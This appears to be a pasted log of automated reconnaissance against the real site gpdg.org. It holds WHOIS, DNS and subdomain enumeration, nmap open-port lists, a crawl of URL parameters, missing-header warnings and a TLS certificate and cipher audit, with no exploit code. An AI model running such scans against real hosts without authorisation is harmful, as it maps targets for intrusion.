· 6 years ago · Nov 25, 2019, 06:09 PM
1#######################################################################################################################################
2=======================================================================================================================================
3Hostname www.gpdg.org ISP CTS Computers and Telecommunications Systems SAS
4Continent Europe Flag
5FR
6Country France Country Code FR
7Region Unknown Local time 25 Nov 2019 16:32 CET
8City Unknown Postal Code Unknown
9IP Address 92.39.247.11 Latitude 48.858
10 Longitude 2.339
11=======================================================================================================================================
12#######################################################################################################################################
13> www.gpdg.org
14Server: 185.93.180.131
15Address: 185.93.180.131#53
16
17Non-authoritative answer:
18Name: www.gpdg.org
19Address: 92.39.247.11
20>
21#######################################################################################################################################
22Domain Name: GPDG.ORG
23Registry Domain ID: D23058562-LROR
24Registrar WHOIS Server: whois.magic.fr
25Registrar URL: http://www.magic.fr
26Updated Date: 2019-02-04T13:00:08Z
27Creation Date: 2000-03-22T12:29:26Z
28Registry Expiry Date: 2020-03-22T12:29:26Z
29Registrar Registration Expiration Date:
30Registrar: CTS Computers and Telecommunications Systems DBA MAGIC ONLINE
31Registrar IANA ID: 820
32Registrar Abuse Contact Email: hostmaster@magic.fr
33Registrar Abuse Contact Phone: +33.437430037
34Reseller:
35Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
36Registrant Organization: GDPR Masked
37Registrant State/Province: GDPR Masked
38Registrant Country: US
39Name Server: NS3.DNS26.NET
40Name Server: NS4.DNS26.NET
41DNSSEC: unsigned
42#######################################################################################################################################
43[+] Target : www.gpdg.org
44
45[+] IP Address : 92.39.247.11
46
47[+] Headers :
48
49[+] Server : nginx
50[+] Date : Mon, 25 Nov 2019 15:36:37 GMT
51[+] Content-Type : text/html
52[+] Content-Length : 42164
53[+] Last-Modified : Sun, 12 May 2019 12:28:01 GMT
54[+] Connection : keep-alive
55[+] ETag : "5cd81151-a4b4"
56[+] X-Powered-By : PleskLin
57[+] Accept-Ranges : bytes
58
59[+] SSL Certificate Information :
60
61[+] countryName : CH
62[+] localityName : Schaffhausen
63[+] organizationName : Plesk
64[+] commonName : Plesk
65[+] emailAddress : info@plesk.com
66[+] countryName : CH
67[+] localityName : Schaffhausen
68[+] organizationName : Plesk
69[+] commonName : Plesk
70[+] emailAddress : info@plesk.com
71[+] Version : 1
72[+] Serial Number : 5CA23013
73[+] Not Before : Apr 1 15:36:51 2019 GMT
74[+] Not After : Mar 31 15:36:51 2020 GMT
75
76[+] Whois Lookup :
77
78[+] NIR : None
79[+] ASN Registry : ripencc
80[+] ASN : 35393
81[+] ASN CIDR : 92.39.240.0/20
82[+] ASN Country Code : FR
83[+] ASN Date : 2010-01-07
84[+] ASN Description : EURO-WEB-AS, FR
85[+] cidr : 92.39.247.9/32, 92.39.247.10/31, 92.39.247.12/30, 92.39.247.16/31
86[+] name : Magic-UNITEDKINGDOM
87[+] handle : EMN13-RIPE
88[+] range : 92.39.247.9 - 92.39.247.17
89[+] description : Magic-UNITEDKINGDOM
90[+] country : GB
91[+] state : None
92[+] city : None
93[+] address : MAGIC ONLINE
9445/47 rue Francis de Pressens
9569100 Villeurbanne
96France
97[+] postal_code : None
98[+] emails : ['abuse@magic.fr']
99[+] created : 2013-08-20T11:04:38Z
100[+] updated : 2018-07-18T13:44:54Z
101
102[+] Crawling Target...
103
104[+] Looking for robots.txt........[ Not Found ]
105[+] Looking for sitemap.xml.......[ Found ]
106[+] Extracting sitemap Links......[ 35 ]
107[+] Extracting CSS Links..........[ 3 ]
108[+] Extracting Javascript Links...[ 2 ]
109[+] Extracting Internal Links.....[ 0 ]
110[+] Extracting External Links.....[ 0 ]
111[+] Extracting Images.............[ 2 ]
112
113[+] Total Links Extracted : 42
114
115[+] Dumping Links in /opt/FinalRecon/dumps/www.gpdg.org.dump
116[+] Completed!
117#######################################################################################################################################
118[i] Scanning Site: http://www.gpdg.org
119
120
121
122B A S I C I N F O
123====================
124
125
126[+] Site Title: Bienvenue sur le portail du Grand Prieuré des Gaules - Ordre des Francs-Maçons Chrétiens de France
127[+] IP address: 92.39.247.11
128[+] Web Server: nginx
129[+] CMS: Could Not Detect
130[+] Cloudflare: Not Detected
131[+] Robots File: Could NOT Find robots.txt!
132
133
134
135
136W H O I S L O O K U P
137========================
138
139 Domain Name: GPDG.ORG
140Registry Domain ID: D23058562-LROR
141Registrar WHOIS Server: whois.magic.fr
142Registrar URL: http://www.magic.fr
143Updated Date: 2019-02-04T13:00:08Z
144Creation Date: 2000-03-22T12:29:26Z
145Registry Expiry Date: 2020-03-22T12:29:26Z
146Registrar Registration Expiration Date:
147Registrar: CTS Computers and Telecommunications Systems DBA MAGIC ONLINE
148Registrar IANA ID: 820
149Registrar Abuse Contact Email: hostmaster@magic.fr
150Registrar Abuse Contact Phone: +33.437430037
151Reseller:
152Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
153Registrant Organization: GDPR Masked
154Registrant State/Province: GDPR Masked
155Registrant Country: US
156Name Server: NS3.DNS26.NET
157Name Server: NS4.DNS26.NET
158DNSSEC: unsigned
159URL of the ICANN Whois Inaccuracy Complaint Form https://www.icann.org/wicf/)
160>>> Last update of WHOIS database: 2019-11-25T15:35:49Z <<<
161
162For more information on Whois status codes, please visit https://icann.org/epp
163
164
165
166
167
168G E O I P L O O K U P
169=========================
170
171[i] IP Address: 92.39.247.11
172[i] Country: France
173[i] State:
174[i] City:
175[i] Latitude: 48.8582
176[i] Longitude: 2.3387000000000002
177
178
179
180
181H T T P H E A D E R S
182=======================
183
184
185[i] HTTP/1.1 200 OK
186[i] Server: nginx
187[i] Date: Mon, 25 Nov 2019 15:36:51 GMT
188[i] Content-Type: text/html
189[i] Content-Length: 42164
190[i] Last-Modified: Sun, 12 May 2019 12:28:01 GMT
191[i] Connection: close
192[i] ETag: "5cd81151-a4b4"
193[i] X-Powered-By: PleskLin
194[i] Accept-Ranges: bytes
195
196
197
198
199D N S L O O K U P
200===================
201
202gpdg.org. 359 IN A 92.39.247.11
203gpdg.org. 3599 IN SOA ns3.dns26.net. gwasselin.gmail.com. 3018194 14400 7200 2419200 3600
204gpdg.org. 3599 IN NS ns4.dns26.net.
205gpdg.org. 3599 IN NS ns3.dns26.net.
206gpdg.org. 359 IN MX 30 mail.gpdg.org.
207
208
209
210
211S U B N E T C A L C U L A T I O N
212====================================
213
214Address = 92.39.247.11
215Network = 92.39.247.11 / 32
216Netmask = 255.255.255.255
217Broadcast = not needed on Point-to-Point links
218Wildcard Mask = 0.0.0.0
219Hosts Bits = 0
220Max. Hosts = 1 (2^0 - 0)
221Host Range = { 92.39.247.11 - 92.39.247.11 }
222
223
224
225N M A P P O R T S C A N
226============================
227
228Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-25 15:36 UTC
229Nmap scan report for gpdg.org (92.39.247.11)
230Host is up (0.092s latency).
231rDNS record for 92.39.247.11: vps2330-cloud.sd-france.net
232
233PORT STATE SERVICE
23421/tcp open ftp
23522/tcp open ssh
23623/tcp filtered telnet
23780/tcp open http
238110/tcp open pop3
239143/tcp open imap
240443/tcp open https
2413389/tcp filtered ms-wbt-server
242
243Nmap done: 1 IP address (1 host up) scanned in 1.94 seconds
244
245
246
247S U B - D O M A I N F I N D E R
248==================================
249
250
251[i] Total Subdomains Found : 1
252
253[+] Subdomain: www.gpdg.org
254[-] IP: 92.39.247.11
255#######################################################################################################################################
256[+] Starting At 2019-11-25 10:37:01.714445
257[+] Collecting Information On: http://www.gpdg.org/
258[#] Status: 200
259--------------------------------------------------
260[#] Web Server Detected: nginx
261[#] X-Powered-By: PleskLin
262[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
263- Server: nginx
264- Date: Mon, 25 Nov 2019 15:37:02 GMT
265- Content-Type: text/html
266- Content-Length: 42164
267- Last-Modified: Sun, 12 May 2019 12:28:01 GMT
268- Connection: keep-alive
269- ETag: "5cd81151-a4b4"
270- X-Powered-By: PleskLin
271- Accept-Ranges: bytes
272--------------------------------------------------
273[#] Finding Location..!
274[#] status: success
275[#] country: United Kingdom
276[#] countryCode: GB
277[#] region: ENG
278[#] regionName: England
279[#] city: London
280[#] zip: W1B
281[#] lat: 51.5074
282[#] lon: -0.127758
283[#] timezone: Europe/London
284[#] isp: CTS Computers and Telecommunications Systems SAS
285[#] org: Magic UNITEDKINGDOM
286[#] as: AS35393 CTS Computers and Telecommunications Systems SAS
287[#] query: 92.39.247.11
288--------------------------------------------------
289[x] Didn't Detect WAF Presence on: http://www.gpdg.org/
290--------------------------------------------------
291[#] Starting Reverse DNS
292[-] Failed ! Fail
293--------------------------------------------------
294[!] Scanning Open Port
295[#] 21/tcp open ftp
296[#] 22/tcp open ssh
297[#] 53/tcp open domain
298[#] 80/tcp open http
299[#] 106/tcp open pop3pw
300[#] 110/tcp open pop3
301[#] 143/tcp open imap
302[#] 443/tcp open https
303[#] 465/tcp open smtps
304[#] 993/tcp open imaps
305[#] 995/tcp open pop3s
306[#] 4900/tcp open hfcs
307[#] 8443/tcp open https-alt
308--------------------------------------------------
309[+] Collecting Information Disclosure!
310[#] Detecting sitemap.xml file
311[!] sitemap.xml File Found: http://www.gpdg.org//sitemap.xml
312[#] Detecting robots.txt file
313[-] robots.txt file not Found!?
314[#] Detecting GNU Mailman
315[-] GNU Mailman App Not Detected!?
316--------------------------------------------------
317[+] Crawling Url Parameter On: http://www.gpdg.org/
318--------------------------------------------------
319[#] Searching Html Form !
320[-] No Html Form Found!?
321--------------------------------------------------
322[!] Found 4 dom parameter
323[#] http://www.gpdg.org//tablet/a-propos.html?devicelock=tablet#ou-sommes-nous
324[#] http://www.gpdg.org//a-propos.html#ou_sommes_nous
325[#] http://www.gpdg.org//publications.html#cahiers-verts_anciens-sommaires
326[#] http://www.gpdg.org//a-propos.html#qui-sommes-nous
327--------------------------------------------------
328[!] 5 Internal Dynamic Parameter Discovered
329[+] http://www.gpdg.org//css/site_global.css?crc=63142993
330[+] http://www.gpdg.org//css/master_master.css?crc=3965596738
331[+] http://www.gpdg.org//css/index.css?crc=3879992635
332[+] http://www.gpdg.org//css/iefonts_index.css?crc=527448073
333[+] http://www.gpdg.org//tablet/a-propos.html?devicelock=tablet#ou-sommes-nous
334--------------------------------------------------
335[-] No external Dynamic Paramter Found!?
336--------------------------------------------------
337[!] 34 Internal links Discovered
338[+] http://gpdg.org/phone/index.html
339[+] http://gpdg.org/tablet/index.html
340[+] http://www.gpdg.org//index.html
341[+] http://www.gpdg.org//page:U68
342[+] http://www.gpdg.org//anchor:U10694:U11490
343[+] http://www.gpdg.org//anchor:U2667:U4901
344[+] http://www.gpdg.org//contact.html
345[+] http://www.gpdg.org//page:U5506
346[+] http://www.gpdg.org//informations-en-anglais.html
347[+] http://www.gpdg.org//page:U16284
348[+] http://www.gpdg.org//questions_reponses.html
349[+] http://www.gpdg.org//page:U17400
350[+] http://www.gpdg.org//publications.html
351[+] http://www.gpdg.org//page:U3845
352[+] http://www.gpdg.org//anchor:U3834:U17609
353[+] http://www.gpdg.org//rite-ecossais-rectifie.html
354[+] http://www.gpdg.org//page:U10092
355[+] http://www.gpdg.org//rite-francais.html
356[+] http://www.gpdg.org//page:U10333
357[+] http://www.gpdg.org//rite-d-ecosse.html
358[+] http://www.gpdg.org//page:U9243
359[+] http://www.gpdg.org//rite-ecossais-rectifie.html
360[+] http://www.gpdg.org//page:U10092
361[+] http://www.gpdg.org//index.html
362[+] http://www.gpdg.org//page:U68
363[+] http://www.gpdg.org//index.html
364[+] http://www.gpdg.org//page:U68
365[+] http://www.gpdg.org//anchor:U2667:U4356
366[+] http://www.gpdg.org//editos.html
367[+] http://www.gpdg.org//page:U26233
368[+] http://www.gpdg.org//l-historiquedeseditos.html
369[+] http://www.gpdg.org//page:U29923
370[+] http://www.gpdg.org//editos.html
371[+] http://www.gpdg.org//page:U26233
372--------------------------------------------------
373[-] No External Link Found!?
374--------------------------------------------------
375[#] Mapping Subdomain..
376[!] Found 2 Subdomain
377- mail.gpdg.org
378- www.gpdg.org
379--------------------------------------------------
380[!] Done At 2019-11-25 10:37:17.841277
381#######################################################################################################################################
382[INFO] ------TARGET info------
383[*] TARGET: http://www.gpdg.org/
384[*] TARGET IP: 92.39.247.11
385[INFO] NO load balancer detected for www.gpdg.org...
386[*] DNS servers: ns3.dns26.net.
387[*] TARGET server: nginx
388[*] CC: GB
389[*] Country: United Kingdom
390[*] RegionCode: ENG
391[*] RegionName: England
392[*] City: London
393[*] ASN: AS35393
394[*] BGP_PREFIX: 92.39.240.0/20
395[*] ISP: EURO-WEB-AS CTS Computers and Telecommunications Systems SAS, FR
396[INFO] DNS enumeration:
397[*] mail.gpdg.org 92.39.247.11
398[*] webmail.gpdg.org 92.39.247.11
399[INFO] Possible abuse mails are:
400[*] abuse@gpdg.org
401[*] abuse@netissime.com
402[*] abuse@www.gpdg.org
403[*] pb@netissime.com
404[*] postmaster@netissime.com
405[INFO] NO PAC (Proxy Auto Configuration) file FOUND
406[INFO] Starting FUZZing in http://www.gpdg.org/FUzZzZzZzZz...
407[INFO] Status code Folders
408[ALERT] Look in the source code. It may contain passwords
409[INFO] Links found from http://www.gpdg.org/ http://92.39.247.11/:
410[*] http://gpdg.org/phone/index.html
411[*] http://gpdg.org/tablet/index.html
412[*] https://support.plesk.com/
413[*] https://talk.plesk.com/
414[*] https://twitter.com/Plesk
415[*] https://www.facebook.com/Plesk
416[*] https://www.linkedin.com/company/plesk
417[*] https://www.plesk.com/
418[*] https://www.plesk.com/blog
419[*] http://www.gpdg.org/a-propos.html#ou_sommes_nous
420[*] http://www.gpdg.org/a-propos.html#qui-sommes-nous
421[*] http://www.gpdg.org/contact.html
422[*] http://www.gpdg.org/editos.html
423[*] http://www.gpdg.org/index.html
424[*] http://www.gpdg.org/informations-en-anglais.html
425[*] http://www.gpdg.org/l-historiquedeseditos.html
426[*] http://www.gpdg.org/publications.html
427[*] http://www.gpdg.org/publications.html#cahiers-verts_anciens-sommaires
428[*] http://www.gpdg.org/questions_reponses.html
429[*] http://www.gpdg.org/rite-d-ecosse.html
430[*] http://www.gpdg.org/rite-ecossais-rectifie.html
431[*] http://www.gpdg.org/rite-francais.html
432[*] http://www.gpdg.org/tablet/a-propos.html?devicelock=tablet#ou-sommes-nous
433cut: intervalle de champ incorrecte
434Saisissez « cut --help » pour plus d'informations.
435[INFO] Shodan detected the following opened ports on 92.39.247.11:
436[*] 1
437[*] 143
438[*] 21
439[*] 214
440[*] 22
441[*] 25
442[*] 4
443[*] 443
444[*] 465
445[*] 4999
446[*] 53
447[*] 8
448[*] 80
449[*] 8443
450[*] 8880
451[*] 993
452[*] 995
453[INFO] ------VirusTotal SECTION------
454[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
455[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
456[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
457[INFO] ------Alexa Rank SECTION------
458[INFO] Percent of Visitors Rank in Country:
459[INFO] Percent of Search Traffic:
460[INFO] Percent of Unique Visits:
461[INFO] Total Sites Linking In:
462[*] Total Sites
463[INFO] Useful links related to www.gpdg.org - 92.39.247.11:
464[*] https://www.virustotal.com/pt/ip-address/92.39.247.11/information/
465[*] https://www.hybrid-analysis.com/search?host=92.39.247.11
466[*] https://www.shodan.io/host/92.39.247.11
467[*] https://www.senderbase.org/lookup/?search_string=92.39.247.11
468[*] https://www.alienvault.com/open-threat-exchange/ip/92.39.247.11
469[*] http://pastebin.com/search?q=92.39.247.11
470[*] http://urlquery.net/search.php?q=92.39.247.11
471[*] http://www.alexa.com/siteinfo/www.gpdg.org
472[*] http://www.google.com/safebrowsing/diagnostic?site=www.gpdg.org
473[*] https://censys.io/ipv4/92.39.247.11
474[*] https://www.abuseipdb.com/check/92.39.247.11
475[*] https://urlscan.io/search/#92.39.247.11
476[*] https://github.com/search?q=92.39.247.11&type=Code
477[INFO] Useful links related to AS35393 - 92.39.240.0/20:
478[*] http://www.google.com/safebrowsing/diagnostic?site=AS:35393
479[*] https://www.senderbase.org/lookup/?search_string=92.39.240.0/20
480[*] http://bgp.he.net/AS35393
481[*] https://stat.ripe.net/AS35393
482[INFO] Date: 25/11/19 | Time: 10:38:02
483[INFO] Total time: 0 minute(s) and 56 second(s)
484#######################################################################################################################################
485Trying "gpdg.org"
486;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 25212
487;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 2, ADDITIONAL: 2
488
489;; QUESTION SECTION:
490;gpdg.org. IN ANY
491
492;; ANSWER SECTION:
493gpdg.org. 0 IN MX 30 mail.gpdg.org.
494gpdg.org. 0 IN SOA ns3.dns26.net. gwasselin.gmail.com. 3018194 14400 7200 2419200 3600
495gpdg.org. 0 IN A 92.39.247.11
496gpdg.org. 0 IN NS ns4.dns26.net.
497gpdg.org. 0 IN NS ns3.dns26.net.
498
499;; AUTHORITY SECTION:
500gpdg.org. 3600 IN NS ns3.dns26.net.
501gpdg.org. 3600 IN NS ns4.dns26.net.
502
503;; ADDITIONAL SECTION:
504ns4.dns26.net. 28214 IN A 46.21.205.95
505ns3.dns26.net. 28214 IN A 188.130.45.112
506
507Received 223 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 153 ms
508#######################################################################################################################################
509; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> +trace gpdg.org any
510;; global options: +cmd
511. 81626 IN NS l.root-servers.net.
512. 81626 IN NS k.root-servers.net.
513. 81626 IN NS h.root-servers.net.
514. 81626 IN NS i.root-servers.net.
515. 81626 IN NS j.root-servers.net.
516. 81626 IN NS d.root-servers.net.
517. 81626 IN NS g.root-servers.net.
518. 81626 IN NS c.root-servers.net.
519. 81626 IN NS b.root-servers.net.
520. 81626 IN NS f.root-servers.net.
521. 81626 IN NS a.root-servers.net.
522. 81626 IN NS m.root-servers.net.
523. 81626 IN NS e.root-servers.net.
524. 81626 IN RRSIG NS 8 0 518400 20191208050000 20191125040000 22545 . DES5nuyj3DGIteRe7CA3Qb+VnUrNG4ii2jkh6JbXQheBjpUcCVsDZcLx qpZP8Yuzx5DSQeNGy+pCZkJ9NWS1VUq1vRw7a4j/3/eQceItEbbuz0ub OU/LATveyZiCNif6zSpNk1J/+PjVjTXpmQtNSrUC1hzRPuqwaM1mq+jO TBHUCQ+d9lVbDvxiBY0BpqenDAvr+g6eocUpE+zkVd6Hi63uFa8EtqN4 GDZiHUKWfa4sNJfJ+K93smt0jmL2koK+fbGfe5LrFSEqRAqD622cYIwC lYrVAXCQk6GMoB2M6XhsEq8Rs7JF67wF34JgJIGpil1RiZBPHarEOHyD 1donaQ==
525;; Received 525 bytes from 185.93.180.131#53(185.93.180.131) in 168 ms
526
527org. 172800 IN NS a0.org.afilias-nst.info.
528org. 172800 IN NS a2.org.afilias-nst.info.
529org. 172800 IN NS b0.org.afilias-nst.org.
530org. 172800 IN NS b2.org.afilias-nst.org.
531org. 172800 IN NS c0.org.afilias-nst.info.
532org. 172800 IN NS d0.org.afilias-nst.org.
533org. 86400 IN DS 9795 7 1 364DFAB3DAF254CAB477B5675B10766DDAA24982
534org. 86400 IN DS 9795 7 2 3922B31B6F3A4EA92B19EB7B52120F031FD8E05FF0B03BAFCF9F891B FE7FF8E5
535org. 86400 IN RRSIG DS 8 1 86400 20191208050000 20191125040000 22545 . Z0yYUCBQBkybjLHdNRZEhZsJDifDl6vygC36jAIIddl3TBtmzcFXdrsZ 1QxRTWmIASGApPNdiChu9caXYXIj+cdx5lrJDO6s7qMxCRkHop3qEFGH Ek+gGfQrUE6iu2TaLb4uFtHMrzKhDEdsA14BxWWS1+/qDTvSkldaiMBP 306T8tkddCUVkwvZwfA/qa1JR3C4LAImRM9cvsL5g9CDSJMgV+70qMXZ ydSyg8IsIkKwY/i6lyXu4ngEAKuHrikkVkqM1Ph/499KkPv/CgxQn4Qp 4pMX9/1LucdTwEXH2UXstajX1Q0WSSKWqKc9HQ+7x6X7fc0Dim4Yq9rz MeMSqQ==
536;; Received 810 bytes from 192.58.128.30#53(j.root-servers.net) in 172 ms
537
538gpdg.org. 86400 IN NS ns3.dns26.net.
539gpdg.org. 86400 IN NS ns4.dns26.net.
540h9p7u7tr2u91d0v0ljs9l1gidnp90u3h.org. 86400 IN NSEC3 1 1 1 D399EAAB H9PARR669T6U8O1GSG9E1LMITK4DEM0T NS SOA RRSIG DNSKEY NSEC3PARAM
541h9p7u7tr2u91d0v0ljs9l1gidnp90u3h.org. 86400 IN RRSIG NSEC3 7 2 86400 20191216153923 20191125143923 11324 org. BG++HU08uaIZhTOfi3cfI0GUNuZXJEGNjYk1k1QNi6ra3F5syt+oUXRQ o9ik6XvYrPKpmOKBmgnjmwIwU3xxmA7UnhRQXCvJWf556wK28sNtSA8f Y0Au9UTmDjoacEO/hLbRyAM09mX7+qEKZMHiW4VFkIgotd7LPPXuf5GT dWk=
542mf837c4ebuvdmeta4qfhe06acn6cs8tq.org. 86400 IN NSEC3 1 1 1 D399EAAB MF8AEDK5MDV782J7HOJ8BD0J6VBS5CQG
543mf837c4ebuvdmeta4qfhe06acn6cs8tq.org. 86400 IN RRSIG NSEC3 7 2 86400 20191216152802 20191125142802 11324 org. tQgHWHNcLN2ZD8f6V99tII8z/2HOgniFH3psqP9IQcy+Ds+VGIHxgC4k LJoTuQJZsGPEqaQUMvJC6NDI2lzpKP92dXHoLHuw6hJASjebwkkQJqHB Itye9VZel+zk1mTePJEEFakDweHJTfO7CxyFaXoYEtPAxv+cac9s8sxT n7o=
544;; Received 567 bytes from 199.19.53.1#53(c0.org.afilias-nst.info) in 250 ms
545
546gpdg.org. 360 IN A 92.39.247.11
547gpdg.org. 3600 IN SOA ns3.dns26.net. gwasselin.gmail.com. 3018194 14400 7200 2419200 3600
548gpdg.org. 3600 IN NS ns4.dns26.net.
549gpdg.org. 3600 IN NS ns3.dns26.net.
550gpdg.org. 360 IN MX 30 mail.gpdg.org.
551;; Received 222 bytes from 46.21.205.95#53(ns4.dns26.net) in 174 ms
552#######################################################################################################################################
553[*] Performing General Enumeration of Domain: gpdg.org
554[-] DNSSEC is not configured for gpdg.org
555[*] SOA ns3.dns26.net 188.130.45.112
556[*] NS ns3.dns26.net 188.130.45.112
557[*] Bind Version for 188.130.45.112 9.9.4-RedHat-9.9.4-38.el7_3.2
558[*] NS ns4.dns26.net 46.21.205.95
559[*] Bind Version for 46.21.205.95 9.9.4-RedHat-9.9.4-38.el7_3.2
560[*] MX mail.gpdg.org 92.39.247.11
561[*] A gpdg.org 92.39.247.11
562[*] Enumerating SRV Records
563[-] No SRV Records Found for gpdg.org
564[+] 0 Records Found
565#######################################################################################################################################
566[*] Processing domain gpdg.org
567[*] Using system resolvers ['185.93.180.131', '194.187.251.67', '38.132.106.139', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
568[+] Getting nameservers
569188.130.45.112 - ns3.dns26.net
57046.21.205.95 - ns4.dns26.net
571[-] Zone transfer failed
572
573[+] MX records found, added to target list
57430 mail.gpdg.org.
575
576[*] Scanning gpdg.org for A records
57792.39.247.11 - gpdg.org
57892.39.247.11 - lists.gpdg.org
57992.39.247.11 - mail.gpdg.org
58092.39.247.11 - webmail.gpdg.org
58192.39.247.11 - www.gpdg.org
582#######################################################################################################################################
583 AVAILABLE PLUGINS
584 -----------------
585
586 OpenSslCipherSuitesPlugin
587 EarlyDataPlugin
588 CertificateInfoPlugin
589 HeartbleedPlugin
590 RobotPlugin
591 OpenSslCcsInjectionPlugin
592 SessionRenegotiationPlugin
593 CompressionPlugin
594 HttpHeadersPlugin
595 SessionResumptionPlugin
596 FallbackScsvPlugin
597
598
599
600 CHECKING HOST(S) AVAILABILITY
601 -----------------------------
602
603 92.39.247.11:443 => 92.39.247.11
604
605
606
607
608 SCAN RESULTS FOR 92.39.247.11:443 - 92.39.247.11
609 ------------------------------------------------
610
611 * Downgrade Attacks:
612 TLS_FALLBACK_SCSV: OK - Supported
613
614 * Certificate Information:
615 Content
616 SHA1 Fingerprint: 5da0817d7f4decbd7d5c4ed1ad8467db5efaaba7
617 Common Name: Plesk
618 Issuer: Plesk
619 Serial Number: 1554133011
620 Not Before: 2019-04-01 15:36:51
621 Not After: 2020-03-31 15:36:51
622 Signature Algorithm: sha256
623 Public Key Algorithm: RSA
624 Key Size: 2048
625 Exponent: 65537 (0x10001)
626 DNS Subject Alternative Names: []
627
628 Trust
629 Hostname Validation: FAILED - Certificate does NOT match 92.39.247.11
630 Android CA Store (9.0.0_r9): FAILED - Certificate is NOT Trusted: self signed certificate
631 Apple CA Store (iOS 12, macOS 10.14, watchOS 5, and tvOS 12):FAILED - Certificate is NOT Trusted: self signed certificate
632 Java CA Store (jdk-12.0.1): FAILED - Certificate is NOT Trusted: self signed certificate
633 Mozilla CA Store (2019-03-14): FAILED - Certificate is NOT Trusted: self signed certificate
634 Windows CA Store (2019-05-27): FAILED - Certificate is NOT Trusted: self signed certificate
635 Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
636 Received Chain: Plesk
637 Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
638 Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
639 Received Chain Order: OK - Order is valid
640 Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
641
642 Extensions
643 OCSP Must-Staple: NOT SUPPORTED - Extension not found
644 Certificate Transparency: NOT SUPPORTED - Extension not found
645
646 OCSP Stapling
647 NOT SUPPORTED - Server did not send back an OCSP response
648
649 * TLSV1_1 Cipher Suites:
650 Forward Secrecy OK - Supported
651 RC4 OK - Not Supported
652
653 Preferred:
654 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
655 Accepted:
656 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
657 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
658 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
659 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
660 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
661 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
662
663 * OpenSSL Heartbleed:
664 OK - Not vulnerable to Heartbleed
665
666 * TLSV1_2 Cipher Suites:
667 Forward Secrecy OK - Supported
668 RC4 OK - Not Supported
669
670 Preferred:
671 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
672 Accepted:
673 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
674 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
675 TLS_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
676 TLS_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
677 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
678 TLS_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
679 TLS_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
680 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
681 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
682 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 256 bits HTTP 200 OK
683 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
684 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
685 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
686 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
687
688 * SSLV3 Cipher Suites:
689 Server rejected all cipher suites.
690
691 * TLS 1.2 Session Resumption Support:
692 With Session IDs: NOT SUPPORTED (0 successful, 5 failed, 0 errors, 5 total attempts).
693 With TLS Tickets: OK - Supported
694
695 * OpenSSL CCS Injection:
696 OK - Not vulnerable to OpenSSL CCS injection
697
698 * SSLV2 Cipher Suites:
699 Server rejected all cipher suites.
700
701 * TLSV1 Cipher Suites:
702 Forward Secrecy OK - Supported
703 RC4 OK - Not Supported
704
705 Preferred:
706 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
707 Accepted:
708 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
709 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
710 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
711 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
712 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
713 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
714
715 * Session Renegotiation:
716 Client-initiated Renegotiation: OK - Rejected
717 Secure Renegotiation: OK - Supported
718
719 * Deflate Compression:
720 OK - Compression disabled
721
722 * TLSV1_3 Cipher Suites:
723 Server rejected all cipher suites.
724
725 * ROBOT Attack:
726 OK - Not vulnerable
727
728
729 SCAN COMPLETED IN 32.43 S
730 -------------------------
731#######################################################################################################################################
732Domains still to check: 1
733 Checking if the hostname gpdg.org. given is in fact a domain...
734
735Analyzing domain: gpdg.org.
736 Checking NameServers using system default resolver...
737 IP: 188.130.45.112 (France)
738 HostName: ns3.dns26.net Type: NS
739 HostName: ns3.dns26.net Type: PTR
740 IP: 46.21.205.95 (France)
741 HostName: ns4.dns26.net Type: NS
